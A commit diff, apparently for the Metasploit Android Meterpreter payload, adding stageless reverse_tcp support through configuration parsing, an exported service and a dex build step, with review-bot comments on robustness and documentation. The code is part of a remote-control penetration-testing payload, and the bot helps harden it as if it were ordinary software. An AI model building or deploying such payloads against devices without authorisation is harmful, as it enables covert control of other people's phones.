android stageless reverse_tcp
This commit is contained in:
parent
46d60d2c51
commit
8154ae317d
@ -58,7 +58,7 @@
|
||||
</intent-filter>
|
||||
</receiver>
|
||||
|
||||
<service android:name=".MainService"/>
|
||||
<service android:name=".MainService" android:exported="true" />
|
||||
</application>
|
||||
|
||||
</manifest>
|
||||
|
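Review bot: The service gains `android:exported="true"` with no `android:permission` and no note on why it must be reachable from other packages; an exported service that declares no permission can be started or bound by any app on the device, which is what the Android lint check `ExportedService` warns about. If it is only started from within this package, `android:exported="false"` is the safe explicit value; if an external caller genuinely needs it, an XML comment on the element, `<!-- exported: started by [caller - fill in] -->`, records the decision. The hunk does not show whether the service carries an intent-filter, so I cannot tell which case applies.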
@ -145,6 +145,19 @@
|
||||
<arg value="${com.metasploit:Metasploit-Java-Meterpreter-stdapi:jar}" />
|
||||
<arg value="${com.metasploit:Metasploit-JavaPayload:jar}" />
|
||||
</exec>
|
||||
|
||||
<echo>Building stageless meterpreter</echo>
|
||||
<exec executable="${android.sdk.path}/platforms/android-3/tools/${dx.filename}" failonerror="true">
|
||||
<arg value="--verbose" />
|
||||
<arg value="--dex" />
|
||||
<arg value="--output=${project.basedir}/../../${deploy.path}/data/android/meterpreter.dex" />
|
||||
<arg value="${project.basedir}/../app/target/classes" />
|
||||
<arg value="${project.basedir}/target/dx/meterpreter" />
|
||||
<arg value="${com.metasploit:Metasploit-Java-Meterpreter:jar}" />
|
||||
<arg value="${com.metasploit:Metasploit-Java-Meterpreter-stdapi:jar}" />
|
||||
<arg value="${com.metasploit:Metasploit-JavaPayload:jar}" />
|
||||
</exec>
|
||||
|
||||
</target>
|
||||
</configuration>
|
||||
</execution>
|
||||
|
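Review bot: The added `<exec>` for the stageless dex repeats the staged block above it almost line for line; only the `--output` path and the extra `${project.basedir}/target/dx/meterpreter` input differ, so the two argument lists will drift apart as soon as one of them gains a jar. Hoisting the shared `<arg>` lines into an Ant `<macrodef>`, or at least a property holding the common jar inputs, would keep them in one place — whether the antrun configuration used here permits a macrodef is not visible in the hunk.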
@ -125,6 +125,16 @@ public class AndroidMeterpreter extends Meterpreter {
|
||||
} catch (Exception e) {
|
||||
e.printStackTrace();
|
||||
}
|
||||
if (parameters.length > 1 && parameters[1].charAt(0) != ' ') {
|
||||
byte[] configBytes = Utils.hexStringToByteArray(parameters[1]);
|
||||
loadConfiguration(in, rawOut, configBytes);
|
||||
} else {
|
||||
int configLen = in.readInt();
|
||||
byte[] configBytes = new byte[configLen];
|
||||
in.readFully(configBytes);
|
||||
loadConfiguration(in, rawOut, configBytes);
|
||||
this.ignoreBlocks = in.readInt();
|
||||
}
|
||||
|
||||
this.intervalCollectionManager = new IntervalCollectionManager(getContext());
|
||||
this.intervalCollectionManager.start();
|
||||
|
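Review bot: `parameters[1].charAt(0)` in the new condition throws StringIndexOutOfBoundsException when `parameters[1]` is the empty string, so the guard should read `if (parameters.length > 1 && !parameters[1].isEmpty() && parameters[1].charAt(0) != ' ') {`; the `' '` sentinel is also undocumented and deserves a comment such as `// parameters[1] holds a hex-encoded configuration block, or only spaces when the configuration follows on the stream` — the meaning of the spaces is my inference from the two branches, confirm it. In the else branch `configLen` is read from the stream and passed straight to `new byte[configLen]`, so a negative or huge value fails with NegativeArraySizeException or OutOfMemoryError instead of a clear error; a range check, `if (configLen < 0 || configLen > MAX_CONFIG_LEN) throw new IOException("bad configuration length: " + configLen);` with MAX_CONFIG_LEN a constant still to be chosen, applies equally to the same lines in the Meterpreter constructor hunk (`@ -183,7 +169,21`). That else branch is in fact the same five statements the Meterpreter constructor now runs under `beginExecution`; a protected helper in Meterpreter that reads the length, the block and `ignoreBlocks` would let both call it and keep the explanatory comment in one place. The enclosing constructor or method starts outside the hunk.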
@ -43,12 +43,12 @@ public class Meterpreter {
|
||||
|
||||
|
||||
private final TransportList transports = new TransportList();
|
||||
private int ignoreBlocks = 0;
|
||||
protected int ignoreBlocks = 0;
|
||||
private byte[] uuid;
|
||||
private long sessionExpiry;
|
||||
|
||||
|
||||
private void loadConfiguration(DataInputStream in, OutputStream rawOut, byte[] configuration) throws MalformedURLException {
|
||||
protected void loadConfiguration(DataInputStream in, OutputStream rawOut, byte[] configuration) throws MalformedURLException {
|
||||
// socket handle is 4 bytes, followed by exit func, both of
|
||||
// which we ignore.
|
||||
int csr = 8;
|
||||
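Review bot: `loadConfiguration` becomes part of the contract for subclasses by going protected, but it has no Javadoc and its only comment is the one about skipping the first 8 bytes. A header such as `/** Parses the configuration block handed to the payload; the first 8 bytes (socket handle and exit func) are skipped. @param in the stream the block came from @param rawOut the raw output stream @param configuration the raw configuration bytes @throws MalformedURLException if [fill in from the body] */` would tell an overriding class what it must preserve — what the method does with `in` and `rawOut` is outside the hunk, so those parts come from the body. Making the `ignoreBlocks` field protected exposes mutable state to every subclass when it only needs to be assigned once after reading the stream; a protected setter, or a base-class loader that assigns it, keeps the field private. The method body continues outside the hunk.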
@ -159,20 +159,6 @@ public class Meterpreter {
|
||||
* @throws Exception
|
||||
*/
|
||||
public Meterpreter(DataInputStream in, OutputStream rawOut, boolean loadExtensions, boolean redirectErrors, boolean beginExecution) throws Exception {
|
||||
|
||||
int configLen = in.readInt();
|
||||
byte[] configBytes = new byte[configLen];
|
||||
in.readFully(configBytes);
|
||||
|
||||
loadConfiguration(in, rawOut, configBytes);
|
||||
|
||||
// after the configuration block is a 32 bit integer that tells us
|
||||
// how many stages were wired into the payload. We need to stash this
|
||||
// because in the case of TCP comms, we need to skip this number of
|
||||
// blocks down the track when we reconnect. We have to store this in
|
||||
// the meterpreter class instead of the TCP comms class though
|
||||
this.ignoreBlocks = in.readInt();
|
||||
|
||||
this.loadExtensions = loadExtensions;
|
||||
this.commandManager = new CommandManager();
|
||||
this.channels.add(null); // main communication channel?
|
||||
@ -183,7 +169,21 @@ public class Meterpreter {
|
||||
errBuffer = null;
|
||||
err = System.err;
|
||||
}
|
||||
|
||||
if (beginExecution) {
|
||||
|
||||
int configLen = in.readInt();
|
||||
byte[] configBytes = new byte[configLen];
|
||||
in.readFully(configBytes);
|
||||
loadConfiguration(in, rawOut, configBytes);
|
||||
|
||||
// after the configuration block is a 32 bit integer that tells us
|
||||
// how many stages were wired into the payload. We need to stash this
|
||||
// because in the case of TCP comms, we need to skip this number of
|
||||
// blocks down the track when we reconnect. We have to store this in
|
||||
// the meterpreter class instead of the TCP comms class though
|
||||
this.ignoreBlocks = in.readInt();
|
||||
|
||||
startExecuting();
|
||||
}
|
||||
}
|
||||
|
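Review bot: With the configuration read moved under `if (beginExecution)`, a caller that passes `beginExecution == false` now gets an instance on which `loadConfiguration` was never called and whose `ignoreBlocks` stays 0, and nothing in the constructor's Javadoc (the block ending with `@throws Exception` in the preceding hunk) says so. Add `@param beginExecution when true the configuration block and stage count are read from {@code in} and execution starts; when false the caller must call {@link #loadConfiguration} and set {@code ignoreBlocks} itself` so the new division of responsibility is visible to subclasses. The constructor's body continues outside the hunk.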
@ -199,6 +199,8 @@ public class TcpTransport extends Transport {
|
||||
this.inputStream.readFully(throwAway);
|
||||
}
|
||||
// and finally discard the block count
|
||||
this.inputStream.readInt();
|
||||
if (blocks > 0) {
|
||||
this.inputStream.readInt();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
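Review bot: The comment `// and finally discard the block count` on the line above the new `if (blocks > 0)` no longer matches the code, which now reads the trailing int only when `blocks > 0`. Update it to state the condition, e.g. `// the trailing block count is only present when stages were wired in (blocks > 0); a stageless payload has nothing to discard` — the stageless reading is inferred from the commit title, so confirm it before committing to that wording. The enclosing method starts outside the hunk.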
@ -38,4 +38,26 @@ public class Utils {
|
||||
|
||||
return "unknown";
|
||||
}
|
||||
|
||||
|
||||
public static String bytesToHex(byte bytes[]) {
|
||||
char[] hexDigits = {'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'};
|
||||
StringBuilder buf = new StringBuilder(bytes.length * 2);
|
||||
for (byte aByte : bytes) {
|
||||
buf.append(hexDigits[(aByte & 0xf0) >> 4]);
|
||||
buf.append(hexDigits[aByte & 0x0f]);
|
||||
}
|
||||
return buf.toString();
|
||||
}
|
||||
|
||||
public static byte[] hexStringToByteArray(String s) {
|
||||
int len = s.length();
|
||||
byte[] data = new byte[len / 2];
|
||||
for (int i = 0; i < len; i += 2) {
|
||||
data[i / 2] = (byte) ((Character.digit(s.charAt(i), 16) << 4)
|
||||
+ Character.digit(s.charAt(i+1), 16));
|
||||
}
|
||||
return data;
|
||||
}
|
||||
|
||||
}
|
||||
|
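Review bot: `hexStringToByteArray` silently accepts malformed input: an odd-length string fails with StringIndexOutOfBoundsException at `s.charAt(i+1)`, and any non-hex character makes `Character.digit` return -1, which is folded into the result as a garbage byte rather than rejected. A check at the top, `if (len % 2 != 0) throw new IllegalArgumentException("hex string must have even length");`, plus rejecting negative digit values, makes the failure explicit where it originates. `byte bytes[]` in `bytesToHex` is the C-style declaration; `byte[] bytes` is the Java convention. Neither helper has a Javadoc; one line each, `/** Encodes {@code bytes} as lowercase hex, two characters per byte. */` and `/** Decodes a hex string (two characters per byte) into bytes. */`, would do.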